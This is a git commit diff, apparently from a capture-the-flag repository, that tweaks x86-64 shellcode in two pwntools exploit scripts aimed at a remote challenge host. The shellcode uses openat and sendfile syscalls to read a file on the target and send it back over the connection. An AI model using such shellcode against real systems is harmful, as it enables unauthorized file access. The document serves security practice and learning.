learnt about the cqo instruction that sign-extends rax into rdx

This commit is contained in:
jc
2024-10-23 14:17:52 +00:00
parent 8ba0d691c2
commit 24121c97b3
2 changed files with 5 additions and 5 deletions
+2 -2
View File
@@ -8,8 +8,8 @@ r = remote("challenge.bugpwn.com", 1004)
# openat + sendfile # openat + sendfile
shellcode=""" shellcode="""
lea rsi, [rdx+30] lea rsi, [rdx+29]
xor rdx, rdx cqo
xor r10, r10 xor r10, r10
add ax, 257 add ax, 257
syscall syscall
+1 -1
View File
@@ -14,7 +14,7 @@ add r9, 0x4500
mov r15, 0x2f mov r15, 0x2f
push r15 push r15
lea rsi, [rsp] lea rsi, [rsp]
xor rdx, rdx cqo
xor r10, r10 xor r10, r10
add ax, 257 add ax, 257
syscall syscall